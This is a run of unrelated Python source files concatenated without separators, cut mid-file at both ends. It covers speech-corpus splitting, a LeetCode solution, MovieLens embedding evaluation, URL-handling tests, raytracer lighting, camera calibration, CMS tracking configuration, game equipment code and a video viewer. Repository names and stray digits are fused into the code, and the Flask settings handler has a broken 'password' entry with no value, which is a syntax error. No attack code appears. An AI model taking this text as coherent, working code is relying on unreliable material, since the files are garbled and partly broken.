full_corpus.subviews['{}_{}'.format(part, name)] utt_ids.update(sv.utterances.keys()) part_filter = subset.MatchingUtteranceIdxFilter(utt_ids) part_subview = subset.Subview(corpus, filter_criteria=[part_filter]) full_corpus.import_subview(part, part_subview) print('Save ...') os.makedirs(output_folder) full_corpus.save_at(output_folder) def prepare_corpus(corpus, name): if name != 'common_voice': print(' - {}: Find utterances that are too long'.format(name)) too_long = utts_too_long(corpus) else: too_long = set() if name == 'mailabs': # we only use mailabs for training # since we don't know the speakers train_utts = set(corpus.utterances.keys()) train_utts = train_utts - too_long dev_utts = set() test_utts = set() elif name == 'tuda': # we only use kinect-raw files # otherwise sentence of the tuda would occur multiple times # in contrast to other datasets train_utts = set(corpus.subviews['train_kinect-raw'].utterances.keys()) train_utts = train_utts - too_long dev_utts = set(corpus.subviews['dev_kinect-raw'].utterances.keys()) test_utts = set(corpus.subviews['test_kinect-raw'].utterances.keys()) elif name == 'common_voice': train_utts = set(corpus.subviews['train'].utterances.keys()) train_utts = train_utts - too_long dev_utts = set(corpus.subviews['dev'].utterances.keys()) test_utts = set(corpus.subviews['test'].utterances.keys()) else: dur_filter = subset.MatchingUtteranceIdxFilter(too_long, inverse=True) dur_subview = subset.Subview(corpus, filter_criteria=[dur_filter]) train, dev, test = create_train_dev_test(dur_subview) train_utts = set(train.utterances.keys()) dev_utts = set(dev.utterances.keys()) test_utts = set(test.utterances.keys()) # Remove all subviews for subname in list(corpus.subviews.keys()): del corpus.subviews[subname] # Add new subviews train_filter = subset.MatchingUtteranceIdxFilter(train_utts) train_subview = subset.Subview(corpus, filter_criteria=[train_filter]) corpus.import_subview('train', train_subview) dev_filter = subset.MatchingUtteranceIdxFilter(dev_utts) dev_subview = subset.Subview(corpus, filter_criteria=[dev_filter]) corpus.import_subview('dev', dev_subview) test_filter = subset.MatchingUtteranceIdxFilter(test_utts) test_subview = subset.Subview(corpus, filter_criteria=[test_filter]) corpus.import_subview('test', test_subview) def utts_too_long(corpus): utts = set() for utt in tqdm(corpus.utterances.values()): if utt.duration > MAX_TRAIN_UTT_DURATION: utts.add(utt.idx) return utts def create_train_dev_test(corpus): """ Create train/dev/test subsets of the given corpus. Size is computed using length of the transcriptions. """ total_duration = corpus.total_duration test_dev_train_ratio = MAX_DEV_TEST_DURATION / total_duration if test_dev_train_ratio > 0.15: test_dev_train_ratio = 0.15 splitter = subset.Splitter(corpus, SEED) subviews = splitter.split_by_label_length( proportions={ 'train': 1.0 - (2 * test_dev_train_ratio), 'dev': test_dev_train_ratio, 'test': test_dev_train_ratio, }, label_list_idx=audiomate.corpus.LL_WORD_TRANSCRIPT, separate_issuers=True ) return subviews['train'], subviews['dev'], subviews['test'] if __name__ == '__main__': run() # coding=utf-8 """Pre-configured OpenMM Topology object for use with the default protons forcefield.""" from simtk.openmm.app import Topology import os PACKAGE_ROOT = os.path.abspath(os.path.dirname(__file__)) # Patch topology to unload standard bond definitions def unloadStandardBonds(cls): """ Resets _standardBonds and _hasLoadedStandardBonds to original state. """ cls._hasLoadedStandardBonds = False cls._standardBonds = dict() Topology.unloadStandardBonds = classmethod(unloadStandardBonds) Topology.unloadStandardBonds() Topology.loadBondDefinitions( os.path.join(PACKAGE_ROOT, "data", "bonds-amber10-constph.xml") ) LeetCode/weekly-contest-164-2019.11.24/suggestedProducts_1268.py0 #!/usr/bin/env python # -*- coding: utf-8 -*- """ ------------------------------------------------- @ Author : pengj @ date : 2019/11/25 17:27 @ IDE : PyCharm @ GitHub : https://github.com/JackyPJB @ Contact : ------------------------------------------------- Description : 1268. 搜索推荐系统 Search Suggestions System. https://leetcode-cn.com/contest/weekly-contest-164/problems/search-suggestions-system/ ------------------------------------------------- """ import time from typing import List __author__ = 'Max_Pengjb' start_time = time.time() # 下面写上代码块 class Solution: def suggestedProducts(self, products: List[str], searchWord: str) -> List[List[str]]: # 我的思路: # 第一想到的是字典树,看到查找的单词只有一个,想想又要建树,又要查询,遍历好几遍,费时。 # 想到一个简单的:dp 方法 : # 1. 先排序,这没啥好说的 # 2. searchword 查找到第 i 个字母的时候,其实他查找的范围是 i-1 个字母的结果 # 3. 你品,你细品 n = len(searchWord) products.sort() res = [] for i in range(n): tmp = [] for pro in products: if i < len(pro) and pro[i] == searchWord[i]: tmp.append(pro) products = tmp res.append(tmp) res = list(map(lambda x: x[0:3], res)) return res inin = ["havana"] searchWord = "havana" rr = Solution().suggestedProducts(inin, searchWord) print(rr) # 上面中间写上代码块 end_time = time.time() print('Running time: %s Seconds' % (end_time - start_time)) harsh2kumar/movielens-transetest_embedding.py from __future__ import absolute_import, division, print_function import os import sys import argparse import random import numpy as np import pickle from easydict import EasyDict as edict from math import log import torch import torch.nn as nn # from data_utils import * from models import KnowledgeEmbedding def load_embedding(args): state_dict = torch.load(args.model_file) user_embed = state_dict['user.weight'].cpu() movie_embed = state_dict['movie.weight'].cpu() watched_embed = state_dict['user_watched_movie'].cpu() watched_bias = state_dict['user_watched_movie_bias.weight'].cpu() # product_embed = state_dict['product.weight'].cpu() # purchase_embed = state_dict['purchase'].cpu() # purchase_bias = state_dict['purchase_bias.weight'].cpu() results = edict( user_embed=user_embed.data.numpy(), movie_embed=movie_embed.data.numpy(), watched_embed=watched_embed.data.numpy(), watched_bias=watched_bias.data.numpy(), # product_embed=product_embed.data.numpy(), # purchase_embed=purchase_embed.data.numpy(), # purchase_bias=purchase_bias.data.numpy(), ) output_file = '{}/{}_embedding.pkl'.format(args.dataset_dir, args.dataset) with open(output_file, 'wb') as f: pickle.dump(results, f) def load_train_reviews(args): user_watched = {} # {uid: [pid,...], ...} with open(args.train_review_file, 'r') as f: for line in f: line = line.strip() arr = line.split('\t') user_idx = int(arr[0]) movie_idx = int(arr[2]) if user_idx not in user_watched: user_watched[user_idx] = [] user_watched[user_idx].append(movie_idx) output_file = '{}/{}_train_label.pkl'.format(args.dataset_dir, args.dataset) with open(output_file, 'wb') as f: pickle.dump(user_watched, f) # def load_train_reviews(args): # user_products = {} # {uid: [pid,...], ...} # with gzip.open(args.train_review_file, 'r') as f: # for line in f: # line = line.decode('utf-8').strip() # arr = line.split('\t') # user_idx = int(arr[0]) # product_idx = int(arr[1]) # if user_idx not in user_products: # user_products[user_idx] = [] # user_products[user_idx].append(product_idx) # output_file = '{}/{}_train_label.pkl'.format(args.dataset_dir, args.dataset) # with open(output_file, 'wb') as f: # pickle.dump(user_products, f) # def load_test_reviews(args): # user_products = {} # {uid: [pid,...], ...} # with open(args.test_review_file, 'r') as f: # for line in f: # line = line.decode('utf-8').strip() # arr = line.split('\t') # user_idx = int(arr[0]) # product_idx = int(arr[1]) # if user_idx not in user_products: # user_products[user_idx] = [] # user_products[user_idx].append(product_idx) # output_file = '{}/{}_test_label.pkl'.format(args.dataset_dir, args.dataset) # with open(output_file, 'wb') as f: # pickle.dump(user_products, f) def load_test_reviews(args): user_watched = {} # {uid: [pid,...], ...} with open(args.test_review_file, 'r') as f: for line in f: line = line.strip() arr = line.split('\t') user_idx = int(arr[0]) movie_idx = int(arr[2]) if user_idx not in user_watched: user_watched[user_idx] = [] user_watched[user_idx].append(movie_idx) output_file = '{}/{}_test_label.pkl'.format(args.dataset_dir, args.dataset) with open(output_file, 'wb') as f: pickle.dump(user_watched, f) def test(args, topk=10): embed_file = '{}/{}_embedding.pkl'.format(args.dataset_dir, args.dataset) with open(embed_file, 'rb') as f: embeddings = pickle.load(f) train_labels_file = '{}/{}_train_label.pkl'.format(args.dataset_dir, args.dataset) with open(train_labels_file, 'rb') as f: train_user_movie = pickle.load(f) test_labels_file = '{}/{}_test_label.pkl'.format(args.dataset_dir, args.dataset) with open(test_labels_file, 'rb') as f: test_user_movie = pickle.load(f) test_user_idxs = list(test_user_movie.keys()) # print('Num of users:', len(user_idxs)) # print('User:', user_idxs[0], 'Products:', user_products[user_idxs[0]]) user_embed = embeddings['user_embed'][:-1] # remove last dummy user watched_embed = embeddings['watched_embed'] movie_embed = embeddings['movie_embed'][:-1] print('user embed:', user_embed.shape, 'movie embed:', movie_embed.shape) # calculate user + watched embeddings calulated_movie_emb = user_embed + watched_embed # normalize embeddings(TBD) # calulated_product_emb = calulated_product_emb/LA.norm(calulated_product_emb, axis=1, keepdims=True) # calculate Nearest Neighbors scores_matrix = np.dot(calulated_movie_emb, movie_embed.T) print('Max score:', np.max(scores_matrix)) # normalize embeddings(TBD) # norm_calulated_product_emb = calulated_product_emb/LA.norm(calulated_product_emb, axis=1, keepdims=True) # norm_product_embed = product_embed/LA.norm(product_embed, axis=1, keepdims=True) # scores_matrix = np.dot(norm_calulated_product_emb, np.transpose(norm_product_embed)) # print (scores_matrix.shape) # filter the test data item which trained in train data idx_list = [] for uid in train_user_movie: pids = train_user_movie[uid] tmp = list(zip([uid] * len(pids), pids)) idx_list.extend(tmp) idx_list = np.array(idx_list) scores_matrix[idx_list[:, 0], idx_list[:, 1]] = -99 if scores_matrix.shape[1] <= 30000: top_matches = np.argsort(scores_matrix) # sort row by row topk_matches = top_matches[:, -topk:] # user-product matrix, from lowest rank to highest else: # sort in batch way topk_matches = np.zeros((scores_matrix.shape[0], topk), dtype=np.int) i = 0 while i < scores_matrix.shape[0]: start_row = i end_row = np.min([i + 100, scores_matrix.shape[0]]) batch_scores = scores_matrix[start_row:end_row, :] matches = np.argsort(batch_scores) topk_matches[start_row:end_row] = matches[:, -topk:] i = end_row # f = open('results.txt', 'w') # Compute metrics precisions, recalls, ndcgs, hits = [], [], [], [] for uid in test_user_idxs: pred_list, rel_set = topk_matches[uid][::-1], test_user_movie[uid] dcg = 0.0 hit_num = 0.0 for i in range(len(pred_list)): if pred_list[i] in rel_set: dcg += 1. / (log(i + 2) / log(2)) hit_num += 1 # idcg idcg = 0.0 for i in range(min(len(rel_set), len(pred_list))): idcg += 1. / (log(i + 2) / log(2)) ndcg = dcg / idcg recall = hit_num / len(rel_set) precision = hit_num / len(pred_list) hit = 1.0 if hit_num > 0.0 else 0.0 ndcgs.append(ndcg) recalls.append(recall) precisions.append(precision) hits.append(hit) # print(uid) # f.write(' '.join(map(str, pred_list))) # f.write('\n') # f.write(' '.join(map(str, rel_set))) # f.write('\n') # f.close() avg_precision = np.mean(precisions) * 100 avg_recall = np.mean(recalls) * 100 avg_ndcg = np.mean(ndcgs) * 100 avg_hit = np.mean(hits) * 100 print('NDCG={:.3f} | Recall={:.3f} | HR={:.3f} | Precision={:.3f}'.format( avg_ndcg, avg_recall, avg_hit, avg_precision)) # print('NDCG={} | Recall={} | HR={} | Precision={}'.format( # avg_ndcg, avg_recall, avg_hit, avg_precision)) def main(): parser = argparse.ArgumentParser() parser.add_argument('--dataset', type=str, default='MovieLens20M_300epochs', help='One of {MovieLens20M}') args = parser.parse_args() args.dataset_dir = './tmp/{}'.format(args.dataset) # args.dataset_file = args.dataset_dir + '/dataset.pkl' # print(args.dataset_dir + '/train_embedding/embedding_1hop_des_epoch_77.ckpt') model_files = { 'MovieLens20M': args.dataset_dir + '/train_3hop_des_embedding/embedding_3hop_des_epoch_30.ckpt', 'MovieLens20M_100epochs': args.dataset_dir + '/train_embedding/embedding_1hop_des_epoch_100.ckpt', 'MovieLens20M_300epochs': args.dataset_dir + '/train_embedding/embedding_1hop_des_epoch_300.ckpt', # 'Beauty': args.dataset_dir + '/train_embedding_final/embedding_des_epoch_29.ckpt', # 'Cellphones_Accessories': args.dataset_dir + '/train_embedding_final/embedding_des_epoch_30.ckpt', # 'Clothing': args.dataset_dir + '/train_embedding_final/embedding_des_epoch_29.ckpt', # 'CDs_Vinyl': args.dataset_dir + '/train_embedding/embedding_epoch_20.ckpt', } args.model_file = model_files[args.dataset] review_dir = { 'MovieLens20M': './data_processed', 'MovieLens20M_100epochs': './data_processed', 'MovieLens20M_300epochs': './data_processed', # 'Beauty': './data/CIKM2017/reviews_Beauty_5.json.gz.stem.nostop/min_count5/query_split', # 'CDs_Vinyl': './data/CIKM2017/reviews_CDs_and_Vinyl_5.json.gz.stem.nostop/min_count5/query_split', # 'Cellphones_Accessories': './data/CIKM2017/reviews_Cell_Phones_and_Accessories_5.json.gz.stem.nostop/min_count5/query_split', # 'Movies_TV': './data/CIKM2017/reviews_Movies_and_TV_5.json.gz.stem.nostop/min_count5/query_split', # 'Clothing': './data/CIKM2017/reviews_Clothing_Shoes_and_Jewelry_5.json.gz.stem.nostop/min_count5/query_split', } # args.train_review_file = review_dir[args.dataset] + '/train.txt.gz' # args.test_review_file = review_dir[args.dataset] + '/test.txt.gz' args.train_review_file = review_dir[args.dataset] + '/relations_indices/user.watched.movie.txt' args.test_review_file = review_dir[args.dataset] + '/test_indices/test_data.txt' load_embedding(args) load_train_reviews(args) load_test_reviews(args) test(args) if __name__ == '__main__': main() ### test number of users in train set <= 5 ### # ################################################################################################# # # user_watched = {} # {uid: [pid,...], ...} # with open('/home/hrv7/harsh/PycharmProjects/movielens-transe/data_processed/relations_indices/user.watched.movie.txt', 'r') as file_: # for line in file_: # line = line.strip() # arr = line.split('\t') # user_idx = int(arr[0]) # movie_idx = int(arr[2]) # if user_idx not in user_watched: # user_watched[user_idx] = [] # user_watched[user_idx].append(movie_idx) # # for key, items in user_watched.items(): # if len(items)<=5: # print('train_user: ', key) # print(items) # # user_watched = {} # {uid: [pid,...], ...} # with open('/home/hrv7/harsh/PycharmProjects/movielens-transe/data_processed/test_indices/test_data.txt', 'r') as f: # for line in f: # line = line.strip() # arr = line.split('\t') # user_idx = int(arr[0]) # movie_idx = int(arr[2]) # if user_idx not in user_watched: # user_watched[user_idx] = [] # user_watched[user_idx].append(movie_idx) # # for key, items in user_watched.items(): # if len(items)<=5: # print('test_user: ', key)""" Tests for the various utility functions """ # pylint:disable=missing-docstring import pytest import requests from authl import utils def test_request_url(requests_mock): requests_mock.get('http://example.com/', text='insecure') assert utils.request_url('example.com').text == 'insecure' requests_mock.get('https://example.com/', text='secure') assert utils.request_url('example.com').text == 'secure' assert utils.request_url('https://example.com').text == 'secure' assert utils.request_url('http://example.com').text == 'insecure' assert utils.request_url('http://nonexistent') is None assert utils.request_url('invalid://protocol') is None requests_mock.get('https://has.links/', headers={'Link': '; rel="bar"'}) assert utils.request_url('has.links').links['bar']['url'] == 'https://foo' def test_resolve_value(): def moo(): return 5 assert utils.resolve_value(moo) == 5 assert utils.resolve_value(10) == 10 def test_permanent_url(requests_mock): requests_mock.get('http://make-secure.example', status_code=301, headers={'Location': 'https://make-secure.example'}) requests_mock.get('https://make-secure.example', status_code=302, headers={'Location': 'https://make-secure.example/final'}) requests_mock.get('https://make-secure.example/final', text="you made it!") # this redirects permanent to https, which redirects temporary to /final req = requests.get('http://make-secure.example') assert utils.permanent_url(req) == 'https://make-secure.example' # direct request to /final should remain /final req = requests.get('https://make-secure.example/final') assert utils.permanent_url(req) == 'https://make-secure.example/final' # correct case folding req = requests.get('Https://Make-SecuRE.Example/final') assert utils.permanent_url(req) == 'https://make-secure.example/final' # ensure 308 redirect works too requests_mock.get('http://perm-308.example', status_code=308, headers={'Location': 'https://make-secure.example/308'}) requests_mock.get('https://make-secure.example/308', status_code=401) req = requests.get('http://perm-308.example') assert utils.permanent_url(req) == 'https://make-secure.example/308' # make sure that it's the last pre-temporary redirect that counts requests_mock.get('https://one/', status_code=301, headers={'Location': 'https://two/'}) requests_mock.get('https://two/', status_code=302, headers={'Location': 'https://three/'}) requests_mock.get('https://three/', status_code=301, headers={'Location': 'https://four/'}) requests_mock.get('https://four/', text="done") req = requests.get('https://one/') assert req.url == 'https://four/' assert utils.permanent_url(req) == 'https://two/' assert req.text == 'done' req = requests.get('https://two/') assert req.url == 'https://four/' assert utils.permanent_url(req) == 'https://two/' assert req.text == 'done' req = requests.get('https://three/') assert req.url == 'https://four/' assert utils.permanent_url(req) == 'https://four/' assert req.text == 'done' def test_pkce_challenge(): assert utils.pkce_challenge('asdf', 'plain') == 'asdf' assert utils.pkce_challenge('foo', 'S256') == 'LCa0a2j_xo_5m0U8HTBBNBNCLXBkg7-g-YpeiGJm564' with pytest.raises(Exception): utils.pkce_challenge('moo', 'plap') giorgiosironi/search from flask import Blueprint, Response from lxml import etree LIBERO_NAMESPACE = 'http://libero.pub' NAMESPACE_MAP = {None: LIBERO_NAMESPACE} def get_search_blueprint() -> Blueprint: blueprint = Blueprint('search', __name__) @blueprint.route('/search', methods=['GET']) def search() -> Response: # pylint: disable=unused-variable root = etree.Element('item-list', nsmap=NAMESPACE_MAP) response = etree.tostring(root, xml_declaration=True, encoding='UTF-8') return Response(response=response, status=200, mimetype='application/xml') return blueprint from dataclasses import dataclass, field from typing import Optional from raytracer.tuple import ( tuple, point, vector, magnitude, normalize, dot, cross, reflect, Color, ) from raytracer.lights import PointLight from raytracer.patterns import Pattern @dataclass class Material: color: Color = field(default_factory=lambda: Color(1, 1, 1)) ambient: float = 0.1 diffuse: float = 0.9 specular: float = 0.9 shininess: float = 200.0 pattern: Optional[Pattern] = None black = Color(0, 0, 0) def lighting(material, object, light: PointLight, point, eyev, normalv, in_shadow): if material.pattern is not None: color = material.pattern.pattern_at_shape(object, point) else: color = material.color # combine the surface color with the light's color/intensity effective_color = color * light.intensity # find the direction to the light source lightv = normalize(light.position - point) # compute the ambient contribution ambient = effective_color * material.ambient if in_shadow: return ambient # light_dot_normal: represents the cosine of the angle between the # light vector and the normal vector. A negative number means the # light is on the other side of the surface. light_dot_normal = dot(lightv, normalv) if light_dot_normal < 0: diffuse = black specular = black else: # compute the diffuse contribution diffuse = effective_color * material.diffuse * light_dot_normal # reflect_dot_eye represents the cosine of the angle between the # reflection vector and the eye vector. A negative number means the # light reflects away from the eye. reflectv = reflect(-lightv, normalv) reflect_dot_eye = dot(reflectv, eyev) if reflect_dot_eye <= 0: specular = black else: # compute the specular contribution factor = reflect_dot_eye ** material.shininess specular = light.intensity * material.specular * factor # Add the three contributions together to get the final shading return ambient + diffuse + specular 1-10 import pickle from pathlib import Path import cv2 import numpy as np __all__ = ["Camera", "CALIBRATION_DATA_PATH"] CALIBRATION_DATA_PATH = "camera_cal/calibration.dat" class Camera: @staticmethod def undistort(distorted_img, calibration_data, **kwargs): (_, mtx, dist, _, _) = calibration_data return cv2.undistort(distorted_img, mtx, dist, None, mtx) @staticmethod def calibrate(img_paths, grid=(9, 6)): nx = grid[0] ny = grid[1] grid_indices = np.zeros((nx * ny, 3), np.float32) grid_indices[:, :2] = np.mgrid[0:nx, 0:ny].T.reshape(-1, 2) # Arrays to store object points and image points from all the images. grid_list = [] # 3d points in real world space corners_list = [] # 2d points in image plane. img_shape = None for img_path in img_paths: img = cv2.imread(img_path) gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) if not img_shape: img_shape = gray.shape[::-1] # Find the chessboard corners ret, detected_corners = cv2.findChessboardCorners(gray, grid, None) # If found, add object points, image points if ret == False: continue grid_list.append(grid_indices) corners_list.append(detected_corners) return cv2.calibrateCamera(grid_list, corners_list, img_shape, None, None) @staticmethod def save_calibration(path, caliberation_data): path = Path(path) path.parent.mkdir(parents=True, exist_ok=True) with path.open(mode="wb") as fp: pickle.dump(caliberation_data, fp) @staticmethod def load_calibration(path): path = Path(path) with path.open(mode="rb") as fp: return pickle.load(fp) import FWCore.ParameterSet.Config as cms # TrackingMonitor #### # Clone for Cosmic Track Finder from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import * TrackMon_cosmicTk = TrackerCosmicTrackMon.clone( TrackProducer = 'cosmictrackfinderP5', AlgoName = 'CosmicTk', FolderName = 'Tracking/TrackParameters', doSeedParameterHistos = True ) # Clone for CKF Tracks from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import * TrackMon_ckf = TrackerCosmicTrackMon.clone( TrackProducer = 'ctfWithMaterialTracksP5', AlgoName = 'CKFTk', FolderName = 'Tracking/TrackParameters', doSeedParameterHistos = True ) # Clone for Road Search Tracks from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import * TrackMon_rs = TrackerCosmicTrackMon.clone( TrackProducer = 'rsWithMaterialTracksP5', AlgoName = 'RSTk', FolderName = 'Tracking/TrackParameters', doSeedParameterHistos = True ) # Clone for Beam Halo Muon Tracks # from DQM.TrackingMonitor.TrackerCosmicsTrackingMonitor_cfi import * # TrackMon_bhmuon = TrackerCosmicTrackMon.clone( # TrackProducer = 'ctfWithMaterialTracksBeamHaloMuon', # AlgoName = 'BHMuonTk', # FolderName = 'Tracking/TrackParameters', # doSeedParameterHistos = True # ) # Tracking Efficiency # Clone for Cosmic Tracks from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import * TrackEffMon_cosmicTk = TrackEffMon.clone( TKTrackCollection = 'cosmictrackfinderP5', AlgoName = 'CosmicTk', FolderName = 'Tracking/TrackParameters/TrackEfficiency' ) # Clone for CKF Tracks from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import * TrackEffMon_ckf = TrackEffMon.clone( TKTrackCollection = 'ctfWithMaterialTracksP5', AlgoName = 'CKFTk', FolderName = 'Tracking/TrackParameters/TrackEfficiency' ) # Clone for RS Tracks # from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import * # TrackEffMon_rs = TrackEffMon.clone( # TKTrackCollection = 'rsWithMaterialTracksP5', # AlgoName = 'RSTk', # FolderName = 'Tracking/TrackParameters/TrackEfficiency' # ) # Clone for Beam Halo Tracks from DQM.TrackingMonitor.TrackEfficiencyMonitor_cfi import * TrackEffMon_bhmuon = TrackEffMon.clone( TKTrackCollection = 'ctfWithMaterialTracksBeamHaloMuon', AlgoName = 'BHMuonTk', FolderName = 'Tracking/TrackParameters/TrackEfficiency' ) # Split Tracking from DQM.TrackingMonitor.TrackSplittingMonitor_cfi import * TrackSplitMonitor.FolderName = 'Tracking/TrackParameters/SplitTracks' # LogMessageMonitor #### ### load which are the module to monitor from DQM.TrackingMonitorSource.EDModules2monitor_cfi import * ### load the different flavour of settings of the LogMessageMonitor module from DQM.TrackingMonitorSource.LogMessageMonitor_cff import * for module in selectedModules4cosmics : label = str(module)+'LogMessageMon' locals()[label] = LogMessageMonCommon.clone( pluginsMonName = pluginsMonName[module], modules = modulesLabel[module], categories = categories[module] ) locals()[label].setLabel(label) # DQM Services from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer dqmInfoTracking = DQMEDAnalyzer('DQMEventInfo', subSystemFolder = cms.untracked.string('Tracking') ) # Sequences TrackingDQMTier0_cosmicTk = cms.Sequence(TrackMon_cosmicTk*TrackEffMon_cosmicTk) TrackingDQMTier0_ckf = cms.Sequence(TrackMon_ckf*TrackEffMon_ckf) #TrackingDQMTier0_rs = cms.Sequence(TrackMon_rs*TrackEffMon_rs) #TrackingDQMTier0 = cms.Sequence(TrackMon_cosmicTk*TrackMon_ckf*TrackEffMon_ckf*TrackSplitMonitor*dqmInfoTracking) TrackingDQMTier0 = cms.Sequence(TrackMon_cosmicTk*TrackMon_ckf*TrackEffMon_ckf*TrackSplitMonitor) # MessageLog for module in selectedModules4cosmics : label = str(module)+'LogMessageMon' TrackingDQMTier0_cosmicTk += cms.Sequence(locals()[label]) TrackingDQMTier0_ckf += cms.Sequence(locals()[label]) TrackingDQMTier0 += cms.Sequence(locals()[label]) TrackingDQMTier0 += cms.Sequence(dqmInfoTracking) 0 import dat import music # | DosQuest | 7/12/2018 # # This file is filled with functions specifically for changing your equipment def changeWep(weapon): #Change player's Weapon music.playSE('Sounds/Equip.wav') if weapon == 'dagger': dat.equipmentWeapon = 'Dagger' dat.equipmentWeaponATT = 3 #Alters weapon attack stat based off of the sent 'weapon' string if weapon == 'shortsword': dat.equipmentWeapon = 'Shortsword' dat.equipmentWeaponATT = 11 if weapon == 'longsword': dat.equipmentWeapon = 'Longsword' dat.equipmentWeaponATT = 21 def changeArmor(armor): #Change player's Armor music.playSE('Sounds/Equip.wav') if armor == 'leatherarmor': dat.equipmentArmor = 'Leather Armor' dat.equipmentArmorDEF = 4 #Alters armor defense stat based off of the sent 'armor' string if armor == 'platearmor': dat.equipmentArmor = 'Plate Armor' dat.equipmentArmorDEF = 9 def changeShield(shield): #Change player's Shield music.playSE('Sounds/Equip.wav') if shield == 'shield': dat.equipmentShield = 'Shield' dat.equipmentArmorBlock = 0.25 #.25 means 25%. This gives the player an additional 25% damage reduction while blocking dat.equipmentShieldDEF = 2 #The shield's defense stat0 from app import app, render_template, request import json @app.route('/configuration.html', methods=['GET', 'POST']) def config(): with open('app/settings.json', 'r') as settings_file: settings = json.loads(settings_file.read()) if request.method == 'POST': tmdb_lang = request.form['tmdb_lang'] qb_ip = request.form['qb_ip'] qb_port = request.form['qb_port'] qb_pass = request.form['qb_password'] qb_username = request.form['qb_username'] torrent_filepath = request.form['file_path'] tmdb_api_key = request.form['tmdb_api_key'] # Dirty way to make it work when restrictive is off try: is_restrictive_search = request.form['restrictive'] except KeyError: is_restrictive_search = "off" new_settings = { "tmdb_language": tmdb_lang, "tmdb_api_key": tmdb_api_key, "qbittorrent_webui": { "ip": qb_ip, "port": qb_port, "credentials": { "username": qb_username, "password": } }, "default_saving_path": torrent_filepath, "strict_search": is_restrictive_search } with open('app/settings.json', 'w') as settings_file: settings_file.write(json.dumps(new_settings, indent=4)) return render_template('configuration.html', settings=new_settings) else: return render_template('configuration.html', settings=settings) #!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Created on Mon Jul 29 22:01:49 2019 @author: andrej """ import numpy as np import matplotlib.pyplot as plt import time from cddm.conf import CDDMConfig, CV2_INSTALLED, F32,F64, U16 from cddm.print_tools import print_progress, print import numba as nb if CV2_INSTALLED: import cv2 @nb.njit() def subtract_and_multiply(array, window, bg): tmp = array - bg return tmp * window @nb.vectorize([F32(U16,F32,F32),F64(U16,F64,F64)], target = "parallel") def subtract_and_multiply_vec(array, window, bg): tmp = array - bg return tmp * window def random_dual_frame_video(shape = (512,512), count = 1000): """""" for i in range(count): yield np.random.randn(*shape), np.random.randn(*shape) def fromarrays(arrays): """Creates a multi-frame iterator from given list of arrays. Parameters ---------- arrays : tuple of array-like A tuple of array-like objects that represent a single-camera videos Returns ------- video : iterator A multi-frame iterator """ return (frames for frames in zip(*arrays)) def asarrays(video, count = None): """Loads multi-frame video into numpy arrays. Parameters ---------- video : iterable A multi-frame iterator object. count : int, optional Defines how many frames are in the video. If not provided and video has an undefined length, it will try to load the video using np.asarray. This means that data copying """ def _load(array, frame): array[...] = frame print("Writing to array...") if count is None: try: count = len(video) except TypeError: out = np.asarray(video) out = tuple((out[:,i] for i in range(out.shape[1]))) return out print_progress(0, count) frames = next(video) out = tuple((np.empty(shape = (count,) + frame.shape, dtype = frame.dtype) for frame in frames)) [_load(out[i][0],frame) for i,frame in enumerate(frames)] for j,frames in enumerate(video): print_progress(j+1, count) [_load(out[i][j+1],frame) for i,frame in enumerate(frames)] print_progress(count, count) return out def asmemmaps(basename, video, count = None): """Loads multi-frame video into numpy memmaps. Parameters ---------- basename: str Base name for the filenames of the videos. video : iterable A multi-frame iterator object. count : int, optional Defines how many frames are in the video. If not provided it is determined by len(). """ if count is None: count = len(count) def _load(array, frame): array[...] = frame def _empty_arrays(frames): out = tuple( (np.lib.format.open_memmap(basename + "_{}.npy".format(i), "w+", shape = (count,) + frame.shape, dtype = frame.dtype) for i,frame in enumerate(frames))) return out print("Writing to memmap...") print_progress(0, count) frames = next(video) out = _empty_arrays(frames) [_load(out[i][0],frame) for i,frame in enumerate(frames)] for j,frames in enumerate(video): print_progress(j+1, count) [_load(out[i][j+1],frame) for i,frame in enumerate(frames)] print_progress(count, count) return out class VideoViewer(): fig = None def __init__(self, title = "video"): self.title = title def _prepare_image(self,im): return im def _mpl_imshow(self,im): if self.fig is None: self.fig = plt.figure() self.fig.show() ax = self.fig.add_subplot(111) ax.set_title(self.title) im = self._prepare_image(im) self.l = ax.imshow(im) else: im = self._prepare_image(im) self.l.set_data(im) self.fig.canvas.draw() self.fig.canvas.flush_events() def _cv_imshow(self, im): if self.fig is None: self.fig = self.title im = self._prepare_image(im) #scale from 0 to 1 # immin = im.min() # if immin < 0: # im -= immin # immax = im.max() # if immax > 1: # im = im/immax cv2.imshow(self.fig,im) def imshow(self, im): if CDDMConfig.cv2 == True: self._cv_imshow(im) else: self._mpl_imshow(im) def __del__(self): if CDDMConfig.cv2 == True: cv2.destroyWindow(self.fig) else: plt.close() def _pause(): if CDDMConfig.cv2 == False: plt.pause(0.001) else: cv2.waitKey(1) def play(video, fps = 100., max_delay = 0.1): t0 = None for i, frames in enumerate(video): if t0 is None: t0 = time.time() if time.time()-t0 < i/fps + max_delay: for key in list(_FIGURES.keys()): (viewer, im) = _FIGURES.pop(key) viewer.imshow(im) _pause() yield frames _FIGURES.clear() _FIGURES = {} def apply_window(video, window, inplace = False): for frames in video: if inplace == True: yield tuple((np.multiply(frame, w, frame) for w, frame in zip(window,frames))) else: yield tuple((frame*w for w, frame in zip(window,frames))) def show_video(video, id = 0): title = "video - camera {}".format(id) viewer = VideoViewer(title) for frames in video: _FIGURES[title] = (viewer, frames[id]) yield frames def show_diff(video): title = "video - difference" viewer = VideoViewer(title) for frames in video: if not title in _FIGURES: m = 2* max(frames[0].max(),frames[1].max()) im = frames[0]/m - frames[1]/m + 0.5 _FIGURES[title] = (viewer, im) yield frames if __name__ == '__main__': #from cddm.conf import set_cv2 #set_cv2(False) video = random_dual_frame_video(count = 1000) video = show_video(video) video = show_diff(video) v1,v2 = asarrays(play(video, fps = 20),count = 1000) #for frames in play(video, fps = 20): # pass import typing as t from collections import defaultdict from statistics import mean from bavard_ml_utils.utils import ImportExtraError try: import networkx as nx except ImportError: raise ImportExtraError("ml", __name__) from bavard_ml_utils.types.conversations.actions import Actor from bavard_ml_utils.types.conversations.conversation import ConversationDataset from bavard_ml_utils.types.conversations.dialogue_turns import 